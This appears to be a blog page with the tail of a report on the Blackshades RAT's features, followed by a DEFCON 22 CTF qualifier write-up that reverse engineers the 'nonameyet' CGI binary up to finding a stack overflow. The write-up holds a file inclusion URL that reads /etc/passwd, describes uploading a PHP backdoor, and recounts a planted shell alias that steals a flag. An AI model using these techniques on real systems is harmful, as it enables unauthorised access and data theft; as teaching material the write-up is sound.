What does Blackshades actually do? Just about anything the controller wants. Lately, the news around Blackshades has focused on its use as “Creepware,” in which a victim’s webcam is turned on remotely. But the RAT can do much more than that. For example, a couple of years ago the Blackshades Stealth version advertised the following capabilities:

  • General Computer Information (local IP, username, operating system (OS), uptime, webcam, etc.)
  • Screen, Webcam, and Voice Capture
  • Keylogger, File Manager, Processes, Password Recovery, Ping
  • Download and Execute, Shell, Maintenance (reconnect, close, restart, uninstall)
  • Open Windows (shows what applications are open)
  • Mac Compatible Client

There were other versions, too. The Blackshades Radar, for example, advertised the ability to set keywords to listen for in either the window title or written text. This would then trigger a key-logger to start logging keystrokes for a controller-specified amount of time, and the data collected would be sent back to the controller via email. This capability helped attackers pinpoint and exfiltrate a desired set of data, without a lot of excess key-logged chaff. Blackshades Recover advertised the ability to collect passwords, CD keys, and product keys for hundreds of popular software applications. And Blackshades Fusion advertised its ability to incorporate many of the previously described functions.

With such an impressive resume of capabilities, it’s no wonder the Syrian government used Blackshades, along with RAT-siblings Dark Comet and Gh0stRAT, against Syrian activists in early 2012. And even though that campaign may also be “so 2012” to some, the well-reported CnC domain used (alosh66(dot)servecounterstrike(dot)com) is still very much alive and kicking. In fact, according to various sources, there have been over 21,000 connection attempts for the domain this year from several countries around the globe, including from the U.S., with the majority coming from a Syrian Internet Service Provider. If this number for alosh66(dot)servecounterstrike(dot)com is accurate, and if that number holds true for the 1,900 domains seized by the FBI, that would equate to potentially 39,879,000 connection attempts to Blackshades CnC domains since January 1, 2014. Fortunately, the domain has essentially been terminated, as it has been resolving to 0.0.0.0 since 2012, but it’s possible that the controller could have reconfigured those systems to communicate via a different CnC domain, meaning all of the aforementioned systems could be actively infected.

While the exact number of infected systems cannot be determined, the recent arrests illustrate the longevity of malware. The cybercrime landscape not only includes new and emerging threats, but also requires constant assessment of older malware. Regardless of how many systems are infected by the Blackshades RAT, the FBI arrests truly highlight the fact that the war on cybercrime is in full swing.

DEFCON Capture the Flag Qualification Challenge #2

This is my second post in a series on DEFCON 22 CTF Qualifications. Last time I examined a problem called shitsco and gave a short overview of CTF. This week, I’d like to walk you through another DEFCON Qualification problem: “nonameyet” from HJ. This problem was worth 3 points and was opened late in the game. It was solved by 10 teams but, sadly, my team, Samurai, was not one of them. I managed to land this one about an hour after the game ended. It’s a common theme among CTF players that they don’t stop after the game ends. There’s always some measure of personal pride on the line when it comes to solving these problems, regardless of points earned.

The problem description for nonameyet is:

I claim no responsibility for the things posted here.
nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me:80

There is no download link provided and the service is running on port 80. We are to assume that this is a web challenge. Browsing to the web application I see that it allows users to upload photos to a /photos directory, hence the disclaimer in the problem description. Whenever a file upload capability is involved in a CTF web challenge, you can bet that it will be a source of a vulnerability. I have yet to see a web application problem in a CTF that provided a counter example.

One of the URLs for the web application looked like this:

http://nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me/index.php?page=xxxxxxx

When I see page=xxxxxxx referencing a filename there is potential for a local file include vulnerability. Indeed, if I visit:

http://nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me/index.php?page=/etc/passwd

I am able to view the shadowed password file on the server. So far, so good. Unfortunately, asking for the flag file directly yields an error. Of course, a 3 point problem would never be so easy in this CTF. Let’s turn our attention back to the file upload.

The page with the HTML for the upload form is upfile.html. This is loaded with a “?page=upfile.html” on the end of the URL. Examining the HTML source code on this file shows that our form data is submitted to /cgi-bin/nonameyet.cgi. We can recover this CGI program with a simple wget command:

$ wget http://nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me/index.php\?page\=cgi-bin/nonameyet.cgi
$ file nonameyet.cgi
nonameyet.cgi: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped

You can find a copy of nonameyet.cgi here

More interestingly, it is also possible to use the upload form to upload anything at all. This just begs to have a PHP backdoor uploaded to the system. We put a simple PHP file manager on http://nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me... and used that to look around the directory structure and permissions placed on the files. Specifically, we could see that the /home/nonameyet/flag file was owned by nonameyet:nonameyet. I need to gain execution as this user to retrieve the flag. The web server executing the PHP scripts (including our backdoor) was running as the web server user.

It is important to note that getting a shell on a box provides an opportunity for many new attack vectors. For this problem, it was actually solved by other teams editing the file /home/nonameyet/.bash_aliases to include an alias that would copy the /home/nonameyet/flag file to /tmp with world readable permissions. The next time anyone popped a shell on this box and ran “ls” they would hand the flag over to another team. This was a very clever and devious thing to do—and in some sense, this is what CTF is all about.

I believe that having this file editable was an oversight on the part of the organizers. This file should not have been writeable. It was a great advantage for the teams that realized this mistake because they were free to look at other problems while waiting for someone else to come along and solve it the “legitimate” way. Furthermore, anyone that thought to look in /tmp before the flag was cleaned up could score points too. Lesson learned: Always poke around more and possibly set up some sort of monitoring for these kinds of issues. I wish I had thought of this first!

Binary Analysis

I went straight for the binary in the problem. The binary was not marked SUID so there must be some webserver magic launching the CGI program as the nonameyet user. Indeed, HJ confirmed that he was using a modified version of suexec after the game. I have already run a file command to see that the CGI program is an ELF 32-bit program. My usual next step is to run strings.

$ strings nonameyet.cgi

I see imports for C functions related to string parsing and file operations including dangerous APIs like strcpy() and sprintf(). I see a list of the errors the CGI program will return and input variables like photo, time, and date. There are some chunks of HTML and HTTP headers too. So far, it is a fairly typical CGI program. If you try to run it you will get an error 900 printed out to you with HTML tags. A quick strace shows that it is looking for the photos directory. Create this directory and you will move on to the program prompting you for input. Just enter ^D to signal an end of file and you will receive an error 902. Back to the strings. One string that really caught my eye was the “cgilib” string. This is indicative of a cgilib library. There were other strings that pointed to a library as well, such as the “/tmp/cgilibXXXXXX” string.

Cgilib is a “library [that] provides a simple and lightweight interface to the Common Gateway Interface (CGI) for C and C++ programs. Its purpose is to provide an easy to use interface to CGI for fast CGI programs written in the C or C++ programming language.” It is also an open source project. We can see from the output of the file command that the nonameyet.cgi program is dynamically linked, so let’s take a quick peek with ldd to see if cgilib is statically compiled into the binary or dynamically loaded at runtime from our system library.

$ ldd nonameyet.cgi
    linux-gate.so.1 => (0xb77dd000)
    libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb761e000)
    /lib/ld-linux.so.2 (0xb77de000)

We do not see cgilib on the list returned from ldd, so the cgilib library is statically linked. That is to say, if cgilib is used in this program, it must have been compiled into the binary, which means that I could have source code for a good chunk of this problem. That would be a great aid in the reverse engineering process. One way to match up statically compiled libraries into CTF binaries is to use the IDA Pro FLAIR tool to generate a FLIRT signature that can be applied to the binary.

Which version of the library should I grab? The reverse lookup on the IP address used for this problem pointed to an Amazon EC2 server. I created an EC2 instance running the latest version of Ubuntu and applied all updates. It is important to mirror the game box as closely as possible. It is even better if we can run from the same ISP. I installed cgilib with this command:

$ sudo apt-get install cgilib

This added a file in /usr/lib/cgilib.a. I pulled this file back to my analysis machine with FLAIR installed and ran:

C:\> pelf -a libcgi.a
C:\> sigmake -n "libcgi" libcgi.pat libcgi.sig

The first command “pelf” will parse the library file and generate patterns for all exported symbols. The output of the command is put into the libcgi.pat file. The next “sigmake” command will read from the libcgi.pat file and create a binary representation that is output in the libcgi.sig file. This sig file can then be copied into the IDA Pro /sig directory and applied to a live database. All of this completely failed. No symbols were applied. I have not identified why. Bummer.

Thankfully, the library is very simple and almost all of the functions contain unique strings. We can download the source code for libcgi, find a function we are interested in, find a string used in that function, then find the same string in IDA Pro. Once we find the string in IDA we can press ‘x’ while the cursor is positioned on that string to find cross-references. If we follow the (hopefully) single cross-reference that exists, we can then name the function referencing that string as it is named in the source code for cgilib. It is a bit slower than FLIRT signatures but we will be able to flag a significant portion of the program as “uninteresting” right away. For example, if we look at the cgiReadFile function in the cgilib source code cgilib-0.7/cgi.c:

char *cgiReadFile (FILE *stream, char *boundary)
{
    char *crlfboundary, *buf;
    size_t boundarylen;
    int c;
    unsigned int pivot;
    char *cp;
    char template[] = "/tmp/cgilibXXXXXX";
    FILE *tmpfile;
    int fd;

We can then find the /tmp/cgilibXXXXXX string in IDA Pro with a “search sequence of bytes”.

This will fail! As it turns out, there is a compiler optimization used on this function causing the string to be loaded as an immediate value on the stack. This is also sometimes used in programs that want to make string analysis more difficult on the reverse engineer. Indeed, if we go back and look at the string output our first clue is there:

~$ strings nonameyet.cgi
/tmp
/cgi
libX
XXXXf

They are broken up into groups of 4. This is because they are referenced as immediate DWORD values being moved into memory. Let’s repeat the search using a smaller string. If we search for “/tmp” we see exactly one spot in the binary where this appears. Here is how IDA shows the string data being loaded onto the stack:
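As a rough illustration of what those immediate values look like, the following Python 3 sketch splits the template string into 4-byte chunks and prints each one as a little-endian DWORD. The helper name dword_immediates is mine, and padding the tail with zero bytes is an assumption; a real compiler may finish the string with a shorter move instead.

```python
import struct


def dword_immediates(text: bytes):
    """Split a NUL-terminated string into (chunk, little-endian DWORD) pairs.

    Assumption: the tail is zero-padded to a multiple of four bytes.
    """
    raw = text + b"\x00"
    raw += b"\x00" * (-len(raw) % 4)
    return [(raw[i:i + 4], struct.unpack("<I", raw[i:i + 4])[0])
            for i in range(0, len(raw), 4)]


if __name__ == "__main__":
    for chunk, value in dword_immediates(b"/tmp/cgilibXXXXXX"):
        # The destination operand is left out; only the immediate matters here.
        print(f"{value:#010x}  ; {chunk!r}")
```

Because each chunk is stored separately inside an instruction, a byte search for the full 17-character string finds nothing, while a search for “/tmp” alone still hits.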

We can now go to the top of this function and name it (‘n’ key) “cgiReadFile.” If you go through the rest of cgi.c you will end up with the following functions named:

The function named cgi_print (my name, not the cgilib name) is frequently called to output error messages that would be useful for debugging purposes. A quick look at this function reveals that if we set dword_804f0dc (normally 0 in the .bss) to something greater than arg0 (I assume this is a logging level?) we can get debugging output from the binary. In gdb the command to do this is:

set {int}0x804F0DC=1000

Here is the decompiled main() function:

int __usercall main@<eax>(char *a1@<esi>)
{
  int result; // eax@2
  void *v2; // eax@15
  int v3; // [sp+1Ch] [bp-4Ch]@1
  int v4; // [sp+20h] [bp-48h]@9
  int v5; // [sp+24h] [bp-44h]@5
  int v6; // [sp+28h] [bp-40h]@9
  int v7; // [sp+2Ch] [bp-3Ch]@5
  int v8; // [sp+30h] [bp-38h]@9
  int v9; // [sp+34h] [bp-34h]@5
  int v10; // [sp+38h] [bp-30h]@9
  int v11; // [sp+3Ch] [bp-2Ch]@5
  int v12; // [sp+40h] [bp-28h]@9
  int v13; // [sp+44h] [bp-24h]@5
  int v14; // [sp+48h] [bp-20h]@9
  size_t file_size; // [sp+4Ch] [bp-1Ch]@1
  const void *v16; // [sp+50h] [bp-18h]@1
  void *s_cgi; // [sp+54h] [bp-14h]@1
  int photo; // [sp+58h] [bp-10h]@1
  int v19; // [sp+5Ch] [bp-Ch]@1

  v16 = 0;
  file_size = 0;
  s_cgi = 0;
  photo = 0;
  v19 = 0;
  memset(&v3, 0, 0x30u);
  s_cgi = cgiInit();
  v19 = open("./photos", 0);
  if ( v19 == -1 ) {
    write_headers();
    printf("<p>ERROR: 900</p>");
    result = 0;
  } else if ( fchdir(v19) == -1 ) {
    write_headers();
    printf("<p>ERROR: 901</p>");
    close(v19);
    result = 0;
  } else {
    close(v19);
    photo = cgiGetFile((int)s_cgi, "photo");
    v3 = cgiGetValue((int)s_cgi, "base");
    v7 = cgiGetValue((int)s_cgi, "time");
    v9 = cgiGetValue((int)s_cgi, "date");
    v11 = cgiGetValue((int)s_cgi, "pixy");
    v13 = cgiGetValue((int)s_cgi, "pixx");
    v5 = cgiGetValue((int)s_cgi, "genr");
    if ( photo ) {
      if ( !v3 )
        v3 = *(_DWORD *)(photo + 8);
      v4 = urldecode(v3);
      v8 = urldecode(v7);
      v6 = urldecode(v5);
      v10 = urldecode(v9);
      v12 = urldecode(v11);
      v14 = urldecode(v13);
      v16 = read_file(*(char **)(photo + 12), (int)&file_size);
      if ( v16 ) {
        if ( file_size ) {
          if ( (interesting((int)&file_size, a1, (int)&v3) & 0x80000000) == 0 ) {
            v2 = base64encode(v3, v4);
            combine_strings("Cookie", v2);
            write_headers();
            cgiFree(s_cgi);
            v19 = open((const char *)v3, 66, 420);
            if ( v19 == -1 ) {
              printf("<p>ERROR: 906</p>", v3);
            } else {
              write(v19, v16, file_size);
              close(v19);
            }
            printf("<meta http-equiv='refresh' content='0;url=../thanks.php'>");
            result = 0;
          } else {
            write_headers();
            printf("<p>ERROR: 905</p>");
            result = 0;
          }
        } else {
          write_headers();
          printf("<p>ERROR: 904. Why the hell would you give me an empty file</p>");
          result = 0;
        }
      } else {
        write_headers();
        printf("<p>ERROR: 903</p>");
        result = 0;
      }
    } else {
      write_headers();
      printf("<p>ERROR: 902</p>");
      result = 0;
    }
  }
  return result;
}

When looking at a CTF problem, you should always be asking yourself “What is happening with my input?” Most of the parsing happens right up front in the cgiInit() function. This function will read and parse CGI input and set up the s_cgi structure. This function first checks for the environment variable CONTENT_TYPE. CGI input is usually passed via environment variables and stdin from the webserver. If this environment variable is not set then the program will read variables from stdin.

If the CONTENT_TYPE variable is set to “multipart/form-data” it will parse out a boundary condition from the variable and call off into the cgiReadMultipart() function before returning. If the CONTENT_TYPE variable is anything else, the program then looks for the REQUEST_METHOD and CONTENT_LENGTH environment variables.

For a REQUEST_METHOD of “GET” the environment variable QUERY_STRING is parsed and for a REQUEST_METHOD of “POST” stdin is parsed. If none of these are specified then the cgiReadVariables() function will prompt for input from the command line. This is very handy for quick testing. The cgiInit() function will also parse cookie information. All of this was learned by reading the cgilib source code for cgiInit().

We have five code paths for parsing our input: multipart, get, post, stdin, and cookies. All of these are standard in cgilib. Which code path should we explore first? Let’s start with the simplest form, no environment variables, and data parsed directly from stdin.
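The dispatch described above can be summarized in a few lines of Python 3. This is only a model of the prose, not a translation of the cgilib source: the function name choose_input_path and the returned labels are hypothetical, the substring test for “multipart/form-data” is an assumption, and cookie parsing (which happens in addition to whichever path is taken) is left out.

```python
def choose_input_path(env: dict) -> str:
    """Pick the parsing path cgiInit() would take, per the description above.

    `env` stands in for the process environment (for example os.environ).
    """
    content_type = env.get("CONTENT_TYPE")
    if content_type is not None and "multipart/form-data" in content_type:
        return "multipart"        # handled by cgiReadMultipart()
    method = env.get("REQUEST_METHOD")
    if method == "GET":
        return "query_string"     # QUERY_STRING is parsed
    if method == "POST":
        return "post_stdin"       # request body is read from stdin
    return "offline_stdin"        # prompt for name=value pairs


if __name__ == "__main__":
    print(choose_input_path({}))
    print(choose_input_path({"REQUEST_METHOD": "GET", "QUERY_STRING": "asdf=asdf"}))
```

Running the binary from a shell with no CGI variables set lands in the last branch, which is why it is the quickest path to test first.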

$ python -c "print 'asdf=asdf'" | ./nonameyet.cgi
(offline mode: enter name=value pairs on standard input)
Content-type: text/html

<p>ERROR: 902</p>

Here we just set a variable asdf = asdf and we are returned error 902, the same as if we passed in no input. Looking back to main() we can easily spot where “ERROR: 902” is printed inside of an else block. Look up to the if condition on that else block and we see that this is because photo = cgiGetFile((int)s_cgi, “photo”); returned NULL. Setting the photo variable from stdin also produces the same error. The cgiGetFile() call did not find a variable called photo registered in the s_cgi structure. There is another interesting behavior here if we set the same variable twice:

$ python -c "print 'asdf=asdf\nasdf=asdf'" | ./nonameyet.cgi
(offline mode: enter name=value pairs on standard input)
Segmentation fault (core dumped)

Crashes are usually really good in a CTF competition. Going into this with a debugger we find:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi
(offline mode: enter name=value pairs on standard input)
asdf=asdf
asdf=asdf

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x4
ECX: 0xb7fcf448 --> 0x8050080 --> 0x66 ('f')
EDX: 0x8050078 ("asdf\nasdf")
ESI: 0x0
EDI: 0x805008d --> 0x0
EBP: 0xbffff668 --> 0xbffff698 --> 0xbffff708 --> 0x0
ESP: 0xbffff590 --> 0x0
EIP: 0x804bb5d (mov edx,DWORD PTR [eax+0x4])
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804bb52: shl eax,0x2
   0x804bb55: add eax,DWORD PTR [ebp-0x84]
   0x804bb5b: mov eax,DWORD PTR [eax]
=> 0x804bb5d: mov edx,DWORD PTR [eax+0x4]
   0x804bb60: mov eax,DWORD PTR [ebp-0x98]
   0x804bb66: shl eax,0x2
   0x804bb69: add eax,DWORD PTR [ebp-0x84]
   0x804bb6f: mov eax,DWORD PTR [eax]
[------------------------------------stack-------------------------------------]
0000| 0xbffff590 --> 0x0
0004| 0xbffff594 --> 0x804d483 ("%s\n%s")
0008| 0xbffff598 --> 0x8050058 --> 0x0
0012| 0xbffff59c --> 0x8050088 --> 0x8050050 --> 0x0
0016| 0xbffff5a0 --> 0xb7fff55c --> 0xb7fde000 --> 0x464c457f
0020| 0xbffff5a4 --> 0x3
0024| 0xbffff5a8 --> 0x0
0028| 0xbffff5ac --> 0xffffffff
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0804bb5d in ?? ()
gdb-peda$

I should mention that I am using PEDA with GDB. It makes exploit development tasks a lot easier than standard GDB. I encourage you to check it out and explore how it works. Anyway, this is a NULL pointer dereference crash. The register EAX is being dereferenced, and EAX is NULL. As a result, the program receives signal 11 (SIGSEGV) and execution terminates. The buggy code seems to be in cgilib/cgi.c on line 644 when they attempt to do:

644: cgiDebugOutput (1, "%s: %s", result[i]->name, result[i]->value);

It looks to me like they used the incorrect index into the result array. There is another index counter called k used earlier in the code that accounts for duplicate variable names. My guess is that this line was simply copied and pasted from line 630 and the developers did not change ‘i’ to ‘k’. Either way, I am not sure if a web server would ever generate input to a CGI program like this, and unless we can somehow allocate the NULL address space on the remote server, this is not likely to be an interesting crash when solving the CTF problem. Interesting, but ultimately useless.

Back to our problem. The photo variable is NULL. Looking back in cgi.c source code for cgiGetFile() it is easy to spot that this information comes from s_cgi->files. Ok, that makes sense. However, the only code path that sets this information is when we have a CONTENT_TYPE of “multipart/form-data”. This was discovered with a quick grep for “->files” in the cgilib source code to find something that writes to this variable. The one place this happens is in the cgiReadMultipart() function. Let’s jump into feeding this program multipart data.

I used Wireshark to perform a packet capture on the data that was being sent by my browser when submitting a form to nonameyet.cgi. After all, the browser should already generate everything we need. With a quick copy and paste and setting up lines to end with \r\n instead of \n I now have the following setup to get multipart data parsed by the CGI program:

$ export CONTENT_TYPE="Content-Type: multipart/form-data; boundary=---------------------------13141138687192"
$ cat formdata
-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="test"
Content-Type: application/octet-stream

test
-----------------------------13141138687192--
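If copying from a packet capture is inconvenient, a file like this can also be generated. The Python 3 sketch below is one way to do it and is not what was used for this write-up: build_formdata and the boundary value are hypothetical, and it emits a single file part only.

```python
def build_formdata(boundary: bytes, field: bytes, filename: bytes,
                   content: bytes,
                   mime: bytes = b"application/octet-stream") -> bytes:
    """Build a one-part multipart/form-data body with CRLF line endings."""
    lines = [
        b"--" + boundary,          # body delimiters carry two extra dashes
        b'Content-Disposition: form-data; name="' + field
        + b'"; filename="' + filename + b'"',
        b"Content-Type: " + mime,
        b"",                       # blank line separates headers from content
        content,
        b"--" + boundary + b"--",  # closing delimiter
        b"",
    ]
    return b"\r\n".join(lines)


if __name__ == "__main__":
    body = build_formdata(b"sketchboundary", b"photo", b"test", b"test")
    with open("formdata", "wb") as fh:   # binary mode keeps \r\n untouched
        fh.write(body)
```

CONTENT_TYPE would then need to name the same boundary, without the two leading dashes that appear in the body.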

Remember each line ends with \r\n. After I set up the formdata file and my environment variable, let’s see if we can get past that error 902 output. I will also turn on the debug output with the debugger after breaking on main():

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ break *0x0804906D
Breakpoint 1 at 0x804906d
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata
Breakpoint 1, 0x0804906d in ?? ()
gdb-peda$ set {int}0x804F0DC=1000
gdb-peda$ c
Continuing.
Content-Type: Content-Type: multipart/form-data; boundary=---------------------------13141138687192
Read line '-----------------------------13141138687192'
Read line 'Content-Disposition: form-data; name="photo"; filename="test"'
Found field name photo
Found filename test
Read line 'Content-Type: application/octet-stream'
Found mime type application/octet-stream
Read line ''
Wrote photo (test) to file: /tmp/cgilibWFDOKJ
Read line '-----------------------------13141138687192'
photo found as test
Content-type: text/html
Cookie: YmFzZQA=

<meta http-equiv='refresh' content='0;url=../thanks.php'>
[Inferior 1 (process 7579) exited normally]

That looks pretty good! In truth, it took a bit of playing around to get to this point. Now we have everything specified in our form being read. The file contents were written and parsed and if we look in the /photos directory we see a file named base with the contents test:

$ ls photos/
base
$ cat photos/base
test
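The Cookie header in the debug run is worth a quick look too. Decoding it in Python 3 shows that it is the Base64 of the output filename including its terminating NUL, which lines up with the base64encode(v3, v4) call in main(). The variable names here are mine.

```python
import base64

cookie = "YmFzZQA="                    # value printed in the debug output
decoded = base64.b64decode(cookie)
print(decoded)                         # b'base\x00'
```

So the file name written under photos/ is reflected back to us in the response.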

Where is the bug? If you look back up in the main() function you will see a subroutine I labeled “interesting”. The only way to get to this function is to have a valid photo returned from cgiGetFile(). Here is the decompiled source code for the interesting function:

unsigned int __usercall interesting@<eax>(int edi0@<edi>, char *a2@<esi>, int a1)
{
  unsigned int result; // eax@1
  void *v4; // esp@2
  char v5; // bl@3
  int v6; // edx@3
  int v7; // ecx@3
  void *v8; // esp@4
  int v9; // ecx@7
  unsigned int v10; // ecx@8
  void *v11; // edi@9
  unsigned int v12; // ecx@11
  void *v13; // edi@12
  unsigned int v14; // ecx@14
  void *v15; // edi@15
  unsigned int v16; // ecx@17
  void *v17; // edi@18
  unsigned int v18; // ecx@20
  void *v19; // edi@21
  int v20; // eax@25
  int v21; // [sp+0h] [bp-20h]@2
  unsigned int counter_1; // [sp+8h] [bp-18h]@1
  const void *esp_ptr; // [sp+Ch] [bp-14h]@2
  int file_name_size; // [sp+10h] [bp-10h]@2
  int filename; // [sp+14h] [bp-Ch]@2
  int type_mult_2; // [sp+18h] [bp-8h]@2
  int counter; // [sp+1Ch] [bp-4h]@1

  result = 0;
  counter = 0;
  counter_1 = 0;
  if ( a1 ) {
    file_name_size = *(_DWORD *)(a1 + 4);
    type_mult_2 = 2 * file_name_size;
    v4 = alloca(2 * file_name_size);
    esp_ptr = &v21;
    filename = *(_DWORD *)a1;
    while ( 1 ) {
      while ( 1 ) {
        v5 = *(_BYTE *)(counter + filename);
        v6 = counter++ + filename + 1;
        v7 = type_mult_2;
        if ( type_mult_2 <= (signed int)counter_1 ) {
          v8 = alloca(type_mult_2);
          qmemcpy(&v21, &v21, type_mult_2);
          a2 = (char *)&v21 + v7;
          edi0 = (int)((char *)&v21 + v7);
          esp_ptr = &v21;
          type_mult_2 *= 2;
        }
        if ( v5 != '%' || *(_BYTE *)(v6 + 4) != '%' ) {
          *((_BYTE *)esp_ptr + counter_1++) = v5;
          goto LABEL_24;
        }
        v9 = *(_DWORD *)v6;
        v6 += 5;
        counter += 5;
        if ( v9 != 'rneG' )
          break;
        v10 = *(_DWORD *)(a1 + 12);
        a2 = *(char **)(a1 + 8);
        if ( a2 ) {
          v11 = (char *)esp_ptr + counter_1;
          counter_1 += v10;
          qmemcpy(v11, a2, v10);
          a2 += v10;
          edi0 = (int)((char *)v11 + v10);
LABEL_24:
          if ( file_name_size <= counter ) {
            v20 = mmap(v6, edi0, (int)a2);
            qmemcpy((void *)v20, esp_ptr, counter_1);
            *(_DWORD *)a1 = v20;
            result = counter_1;
            *(_DWORD *)(a1 + 4) = counter_1;
            return result;
          }
        }
      }
      switch ( v9 ) {
        case 'emiT':
          v12 = *(_DWORD *)(a1 + 20);
          a2 = *(char **)(a1 + 16);
          if ( a2 ) {
            v13 = (char *)esp_ptr + counter_1;
            counter_1 += v12;
            qmemcpy(v13, a2, v12);
            a2 += v12;
            edi0 = (int)((char *)v13 + v12);
            goto LABEL_24;
          }
          break;
        case 'etaD':
          v14 = *(_DWORD *)(a1 + 28);
          a2 = *(char **)(a1 + 24);
          if ( a2 ) {
            v15 = (char *)esp_ptr + counter_1;
            counter_1 += v14;
            qmemcpy(v15, a2, v14);
            a2 += v14;
            edi0 = (int)((char *)v15 + v14);
            goto LABEL_24;
          }
          break;
        case 'YxiP':
          v16 = *(_DWORD *)(a1 + 36);
          a2 = *(char **)(a1 + 32);
          if ( a2 ) {
            v17 = (char *)esp_ptr + counter_1;
            counter_1 += v16;
            qmemcpy(v17, a2, v16);
            a2 += v16;
            edi0 = (int)((char *)v17 + v16);
            goto LABEL_24;
          }
          break;
        case 'XxiP':
          v18 = *(_DWORD *)(a1 + 44);
          a2 = *(char **)(a1 + 40);
          if ( a2 ) {
            v19 = (char *)esp_ptr + counter_1;
            counter_1 += v18;
            qmemcpy(v19, a2, v18);
            a2 += v18;
            edi0 = (int)((char *)v19 + v18);
            goto LABEL_24;
          }
          break;
      }
    }
  }
  return result;
}

There are a few things that jump out at me right away. The first is the use of the alloca() function. The man page for alloca states “The alloca() function allocates size bytes of space in the stack frame of the caller. This temporary space is automatically freed when the function that called alloca() returns to its caller.” Thus, we are dynamically growing the stack based upon file_name_size. This function call ends up being just a “sub esp” instruction in the assembly code, so don’t expect to see an import to alloca in the ELF header.

The next thing I notice is the set of case statements looking for the 4-character string patterns Genr, Time, Date, PixY, and PixX. IDA shows these in little-endian (backwards) format. The program checks for % characters in the filename input that are followed by another % character after 4 more characters. Thus, we are looking for DOS-style variables like %Genr%. It turns out all of these variables are passed in as the third argument to the interesting function.

They are built into a structure that is 0x30 bytes long. First the sizes are built with calls to v3 = cgiGetValue((int)s_cgi, “base”); and the like. Then the strings for the variables are built immediately before the sizes. The IDA decompilation of the main function does not identify this as a structure. However, the memset(&v3, 0, 0x30u); and the fact that only v3 is passed into a function that clearly needs all of these variables is a big clue that this is a structure, or an array of structures, instead of 12 individual variables. The v3 variable in main() (or a1 in interesting()) ends up looking like this:

struct v3
{
  char *filename;
  unsigned int file_name_size;
  char *genr_str;
  unsigned int genr_size;
  char *time_str;
  unsigned int time_size;
  char *date_str;
  unsigned int date_size;
  char *pixy_str;
  unsigned int pixy_size;
  char *pixx_str;
  unsigned int pixx_size;
};
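To tie the switch cases back to this structure, here is a minimal Python sketch that flips the tags IDA printed into the order they appear in the filename and pairs each with the pointer and size offsets read in the decompilation. The helper name tag_as_written and the FIELD_OFFSETS table are mine, for illustration only; the offsets assume 32-bit pointers and sizes, as in the struct above.

```python
import struct

# Multi-character constants exactly as IDA printed them in the decompilation.
IDA_TAGS = ["rneG", "emiT", "etaD", "YxiP", "XxiP"]


def tag_as_written(ida_tag: str) -> str:
    """Return the tag in the byte order it has inside the filename."""
    # IDA prints the 32-bit constant with its most significant byte first.
    value = struct.unpack(">I", ida_tag.encode("ascii"))[0]
    # Packing the same value little-endian gives the in-memory byte order.
    return struct.pack("<I", value).decode("ascii")


# Each variable is a 4-byte pointer followed by a 4-byte size, starting at
# offset 8 (after filename and file_name_size).
FIELD_OFFSETS = {
    tag_as_written(tag): (8 + 8 * i, 12 + 8 * i)
    for i, tag in enumerate(IDA_TAGS)
}
STRUCT_SIZE = 8 + 8 * len(IDA_TAGS)

if __name__ == "__main__":
    for name, (ptr_off, size_off) in FIELD_OFFSETS.items():
        print(f"%{name}%: pointer at a1+{ptr_off}, size at a1+{size_off}")
    print(f"total size: {STRUCT_SIZE:#x}")
```

The computed total matches the 0x30 bytes cleared by the memset in main().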

Have you spotted the bug yet? If not, go back to what is happening with our input in the interesting function. We pass this structure into our function, alloca (file_name_size * 2) and then what? We start copying into this array. It’s the qmemcpy calls that are in question here. These are presented in assembly as rep movsb instructions. Ask yourself how much data is being copied and what is the size of the destination buffer? Do you control the data being copied into the buffer? What variables are being updated in the loops to affect the starting offsets of the copy? Study the code and see if you can answer some of these questions. Do it now, I will wait.

Vulnerability Discovery

What you might notice is that after the program takes the length of file_name, doubles it, and allocates that amount of space on the stack, it will then proceed to copy in the values for the other variables from the structure. For example, if I set the filename “foobar” (name=”photo”; filename=”foobar” in my formdata file) and then if I set the Time input to be AAAAAA the CGI program will allocate 14 bytes on the stack (length of “foobar\0” * 2) and then copy in the value of the %Time% variable, which would also be 6 bytes. This will be clearer when looking at the actual input file.
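The allocation and copy steps just described can be modeled in a few lines of Python. This is a simplified sketch, not the CGI's actual code: expand_filename is a hypothetical helper, it ignores the loop's between-character alloca growth, and it assumes file_name_size counts the trailing NUL (as in the “foobar\0” example).

```python
def expand_filename(filename: bytes, variables: dict) -> tuple:
    """Return (stack bytes reserved, bytes written) for one filename."""
    # Assumption: file_name_size includes the trailing NUL byte.
    reserved = 2 * (len(filename) + 1)
    written = 0
    i = 0
    while i < len(filename):
        # A variable reference is '%', four characters, then '%'.
        is_tag = filename[i:i + 1] == b"%" and filename[i + 5:i + 6] == b"%"
        if is_tag:
            # Unknown or unset variables contribute nothing and are skipped.
            value = variables.get(filename[i + 1:i + 5], b"")
            written += len(value)
            i += 6
        else:
            written += 1  # ordinary characters are copied one at a time
            i += 1
    return reserved, written


if __name__ == "__main__":
    print(expand_filename(b"foobar", {b"Time": b"AAAAAA"}))
    print(expand_filename(b"%Time%", {b"Time": b"AAAAAA"}))
    print(expand_filename(b"%Time%", {b"Time": b"A" * 88}))
```

Comparing the two numbers for different Time lengths shows how the reserved space depends only on the filename, while the bytes written depend on the variable values.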

